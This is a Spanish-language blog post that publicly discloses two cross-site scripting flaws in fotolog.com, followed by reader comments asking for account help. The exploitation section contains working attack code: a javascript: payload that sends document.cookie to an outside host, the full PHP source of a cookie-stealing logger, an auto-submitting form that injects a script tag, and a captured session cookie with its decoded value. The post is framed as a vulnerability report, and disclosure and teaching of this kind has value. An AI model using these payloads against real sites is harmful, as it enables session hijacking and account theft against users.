Fallos en FOTOLOG.COM
Posted on | junio 18, 2008 | 16 Comments
Fallos en FOTOLOG.COM
- Presentación
- Explicación de fallos
- Explotación de fallos
- Despedida
1. Presentación:Hola!
mucho gusto, mi nombre es emiliano soy más conocido en internet por el nick de ” Knet ” y soy programador web orientado a la seguridad de los sistemas informaticos, por medio de este documento les explico y a su vez hago publico varios fallos en el sitio www.fotolog.com.
Les cuento, que los motivos que me llevaron a encontrar dichas fallas fue simplemente la curiosidad y la aplicación de conocimientos sobre el sitio, Aclaro que en ningun momento pense lucrar con dichos fallos o usarlos con algún fin de beneficio personal o algo por el estilo.
Si se los reporto es para que lo reparen de lo contrario, no sere responsable si estas fallas son encontradas por personas mal intencionadas.
Desde ya les digo Gracias por su atencion, y espero no tengan ningún otro problema.
mi Mail de contacto es : Keynet.Security@Gmail.com [ Mail ] [ MSN ]
resido en : BS.AS/Argentina
Desde ya les digo Gracias por su atencion, y espero no tengan ningún otro problema.
mi Mail de contacto es : Keynet.Security@Gmail.com [ Mail ] [ MSN ]
resido en : BS.AS/Argentina
2. Explicación de fallosFallos a tratar:
- Javascript inyección
- XSS del 2do tipo ( Cross Site Scripting )
Fallo nº1 – Javascript inyección:
En concreto el fallo reside en el filtro de variables, en la seccion Mi Cuenta – Perfil
en la parte infererior.
EJ 1:
EJ 2:
Como ven en el “EJ 2″ en la seccion de la URL podemos añadir código JS, y así optener como resultado
la ejecución de un evento JS en el navegador:
EJ 3:
ALERT con el valor de las COOKIES de session:
Fallo nº2 – XSS del 2do tipo:
este segundo fallo reside en el archivo : http://photo.fotolog.com/email_to_friends y tambien es un problema de filtrado de variables.
EJ 1:
y como poemos ver en este segundo ejemplo
EJ 2:
se logro ejecutar codigo html, poniendo en principio la cadena : </textarea> y al dar error cuando se submite la información, el valor del textarea pasa a ser las lineas enviadas por POST las cuales no son filtradas entonces pasa que se cierra el textarea y se ejecuta el código que la sigue . . .
3. Explotación de fallosla principal más simple y riesgosa forma de explotar este fallo es el robo de sessiones, les voy a demostrar en pasos simples como es posible.
Explotando el fallo nº1 – Javascript inyección
EJ 1:
si alcanzamos a ver en esta imagen, modificamos el código fuente ,elevando el valor del input llamado: link:72316332:url
y agregamos la inyeccion JS.
pasemos a explicar la inyeccion JS:
EJ 2:
javascript:document.location=’http://www.remoteexecution.org/style.php?c=’+document.cookie
este evento, lo que va a hacer es que el navegador se redirija a el sitio web :
http://www.remoteexecution.org/ al archivo style.php, siendo este archivo una aplicacion especialmente programada para capturar COOKIES por medio del navegador, su sódigo fuente es parecido a el siguiente :
<?php
$ip=getenv(‘REMOTE_ADDR’);
$cookie=$_GET['c'];
$cookie_file=’cookies.txt’;
if(isset($cookie) && $cookie!=”" && file_exists($cookie_file))
{
$open_file=fopen($cookie_file,’a');
fwrite($open_file,”\n”.’Cookie:’.”\n”.$cookie.”\n”.”IP:”.$ip.”\n”.’————————————–’);
fclose($open_file);
header(‘Location:http://www.fotolog.com/’);
}
?>
que lo que va a hacer es escribir la cookie en un archivo ” cookies.txt “, que luego puede ser utilizada por un usuario mal intencionado. intercambiando los valores de la misma opteniendo así un robo de session:
http://www.remoteexecution.org/ al archivo style.php, siendo este archivo una aplicacion especialmente programada para capturar COOKIES por medio del navegador, su sódigo fuente es parecido a el siguiente :
<?php
$ip=getenv(‘REMOTE_ADDR’);
$cookie=$_GET['c'];
$cookie_file=’cookies.txt’;
if(isset($cookie) && $cookie!=”" && file_exists($cookie_file))
{
$open_file=fopen($cookie_file,’a');
fwrite($open_file,”\n”.’Cookie:’.”\n”.$cookie.”\n”.”IP:”.$ip.”\n”.’————————————–’);
fclose($open_file);
header(‘Location:http://www.fotolog.com/’);
}
?>
que lo que va a hacer es escribir la cookie en un archivo ” cookies.txt “, que luego puede ser utilizada por un usuario mal intencionado. intercambiando los valores de la misma opteniendo así un robo de session:
luego de clickear un usuario el ataquente optiene : cookies.txt
la cookie de session:
cGFpbnRydWxlc3wxfDB8MXwxMjEzMzkwNjM1fDEyMTMzOTA2MzV8MjE5MDY1Mzl8MjkzNmI5ZWIxMDcyMTNiMmJkMTA0NzU4MTQxZWMwZTQ=
desencriptada:
paintrules|1|0|1|1213390635|1213390635|21906539|2936b9eb107213b2bd104758141ec0e4
como ven, se logro robar la session.
Explotando el fallo nº2 – XSS ( Cross Site Scripting )al ser indirecta, la ejecución de código HTML el atacante debe preparar un formulario especialmente modificado que al ser clickeado o incluso puede hacer que se auto envie , provoque la salida de código
de esta manera :
<script>
function enviar()
{
document.formulario.submit();
}
</script>
<body OnLoad=”enviar()”>
<form method=”post” action=”http://photo.fotolog.com/email_to_friends” name=”formulario”>
<input type=”hidden” name=”u” value=”cumbio”>
<input type=”hidden” name=”photo” value=”47041145″>
<input type=”hidden” name=”uploaded” value=”false”>
<input type=”hidden” name=”from” value=”keynet.security@gmail.com”>
<input type=”hidden” name=”to” value=”</textarea><script>document.location=’http://www.remoteexecution.org/style.php?c=’+document.cookie</script>”>
<input type=”hidden” name=”message” value=”He visto una foto en la página Fotolog”>
</form>
</body>
entonces al provocar se ejecutara el script, que anteriormente explique lo que hace.
siendo así cualquier página visitada, posible atacante , con este tipo de fallos en el sitio FOTOLOG.COM
todo es un riesgo.
sin mencionar que en ves de robar sessiones se podrian agregar 20 direcciones de mail que se autoenvien constantemente provocando problemas no solo al servicio de fotolog , sino tambien a terceros . . .
siendo así cualquier página visitada, posible atacante , con este tipo de fallos en el sitio FOTOLOG.COM
todo es un riesgo.
sin mencionar que en ves de robar sessiones se podrian agregar 20 direcciones de mail que se autoenvien constantemente provocando problemas no solo al servicio de fotolog , sino tambien a terceros . . .
Espero que les haya gustado, hayan entendido y sepan valorar mi explicación.
no me responsabilizo del mal uso, y el documento fue confeccionado con el fin de ayudar a la comunidad de FOTOLOG.COM.
reintero mi contacto por [Mail] o [MSN] : Keynet.Security@Gmail.com
Saludos Cordiales.
PD: Disculpen las faltas de ortografia 
Category: Sin categoría
Comments
16 Responses to “Fallos en FOTOLOG.COM”
Leave a Reply
Profile
 |
Enlaces
Páginas
Categorías
Archivos
- febrero 2012
- octubre 2011
- junio 2011
- mayo 2011
- febrero 2011
- octubre 2010
- julio 2010
- junio 2010
- mayo 2010
- abril 2010
- marzo 2010
- enero 2010
- diciembre 2009
- noviembre 2009
- octubre 2009
- agosto 2009
- julio 2009
- junio 2009
- mayo 2009
- abril 2009
- diciembre 2008
- noviembre 2008
- octubre 2008
- septiembre 2008
- agosto 2008
- julio 2008
- junio 2008
- mayo 2008
- febrero 2008
- noviembre 2007
- octubre 2007
- septiembre 2007
- agosto 2007
- julio 2007
- junio 2007
- mayo 2007
- abril 2007
- marzo 2007
- febrero 2007
- enero 2007
- septiembre 2006
- agosto 2006
- julio 2006
- junio 2006
- mayo 2006
- abril 2006
- marzo 2006
- febrero 2006
- enero 2006
- diciembre 2005
- octubre 2005
- septiembre 2005
- agosto 2005
- julio 2005
- junio 2005
- mayo 2005
Entradas recientes
Etiquetas
3-D
3D
3D Doritos Cheese MiX Lentes 3D Estereoscopia Estereoscopicas Rojo Azul Verde Anaglíficas Anaglíficos Anaglífica Anaglífico Stereoscopic Anaglyph comercial anuncio TV Televisión Dorito Manos Pies Ojos
Anaglyph
Anaglífica
Anaglíficas
Anaglífico
Anaglíficos
Animación
Animation
anuncio
azul
BLANCOS
Cheese
comercial
Comercial Doritos
Cruncheando promos
Dorito
Doritos
Doritos Abre La boca
Estereoscopia
Estereoscopicas
filtro
gafas
Glasses
Glass Window
hack
Hackear
Hammond
joaquin sabina
lentes
Manos
micas
MiX
Ojos
Oscar Rovira
pagina web
Pies
rojo
Sabritas
Stereoscopic
Televisión
Trucos
TV
Verde
Mi twitter
- Mmm estrenando recorrer en android... pero dudo que me guste 1 day ago
- @jncmexmia hola nunca ando por twitter in reply to jncmexmia 1 day ago
- Ten siempre tus cosas cuando las necesites con @Dropbox. ¡La cuenta de 2 GB es gratis! http://t.co/Fb8QdTsx 1 week ago
- Tell Congress: Don’t censor the web! http://t.co/mTmUi7Qy 2 weeks ago
- testing post tweet http://t.co/YW9ngkoX 2011-12-15
- More updates...
Posting tweet...
Powered by Twitter Tools
Comentarios recientes
sebastián en Glass Window 2 released / liberado- sebastián en Glass Window 2 released / liberado
Oscar Rovira en Cómo recuperar “hackear” la contraseña de un archivo zip
cesar en Cómo recuperar “hackear” la contraseña de un archivo zip
maricela en primera parte
Bienvenido
Te envío un saludo
con la bandera de tu país
Translator
 |  |  |  |  |  |  |  |
 |  |  |  |  |  |  |  |
 |  |  |  |  |  |  |  |
 |  |  |  |  |  |  |  |
 |  |  |  |  |  |  |  |
 |  | ||||||
Calendario
Enlaces
Meta
Mis imagenes Flickr
|
julio 29th, 2008 @ 3:17 AM
Woow, que bien, que bueno eres jeje
a mi tambien me interesa mucho la seguridad y encontrar bugs en sitios jeje
agosto 5th, 2008 @ 10:43 PM
a mi hija le hackearon el fotolog y esta muy trsite.yo no entiendo de computacion .me ayudas a devolverselo.
fotolog.com/onlytachh
gracias
agosto 5th, 2008 @ 11:01 PM
hola mi problema es que no puedo iniciar sesion queria ver si lo podrias arreglar..gracias..espero tu respuestaah!mi window es 98
agosto 13th, 2008 @ 3:37 PM
flaco te agregue al eme porq no entendi una garcha jaja
agosto 21st, 2008 @ 11:37 AM
hola mira no puedo iniciar secion con la pagina de fotolog
yo quiero entrar y me dise q la pagina no se puede mostra
por fabor me solucionan el probleme se los agradesco
septiembre 9th, 2008 @ 10:55 PM
mi problema esq el fotolog no tiene aceptar o entrar para comensar la iniciacion de seccio te pide los datos pero no tiene aceprtar
porfa ayudame
septiembre 24th, 2008 @ 3:19 PM
me ha hackeado el fotolog
necesito rekuperar la kontraseña
ayudaamee por favor
octubre 10th, 2008 @ 4:53 PM
hola yo estoy aca por q me han cerrado mi
cuenta de fotolog y yo le quiero decir si por favor
me lo pueden volver activar porfavor.
bueno les dejo muchos saludos y espero una
respuesta tuya
noviembre 16th, 2008 @ 9:39 AM
como puedo personalizar el fotolog es que no se lo cree hace poco y lo quiero personalizar gracias
noviembre 16th, 2008 @ 12:23 PM
NO RECUERDO CON QUE NOMBRE ESTOU REGISTRADA , GRACIAS
diciembre 23rd, 2008 @ 5:59 AM
ami me hackearon y me cerraron el fotolog /flasheadiitoh al cual yo pagaba membresia gold.
por favor ayudame a reabrirlo el flog era /flasheadiitoh
agregame asi charlamos por favor yo tenia 18.952 reverses :S soi.flasheadiitoh@hotmail.com
diciembre 29th, 2008 @ 8:41 PM
me podrias activar mi fotolog es
/ziiikaaa
en mi fotolog no tenia gold ni nada pero en una año se le toma cariño porfavor activamelo
enero 21st, 2009 @ 2:33 AM
me cerraron ese fotolog
los abres o los hackeas?
febrero 28th, 2009 @ 5:18 PM
puta la wua el log ke adm me pide a kada rato kodigos para postiar me demoro muxo me lo pueden arreglar
marzo 3rd, 2009 @ 12:05 AM
holiss soy mica son todos unos genios con la fotos los quiero
abril 14th, 2009 @ 9:25 PM
che te agregue al msn, xq no entendi mucho… y tengo un problema con fotolog muchas gracias, ojala me aceptes asi me pdoe shacer me unf avo..dese ya muchas gracias… muy buena carrera la tuya.
yo queir seeguir ingeniero en computacion es parecidoo???
soy fabrizio.ge…. sigue
..aceptame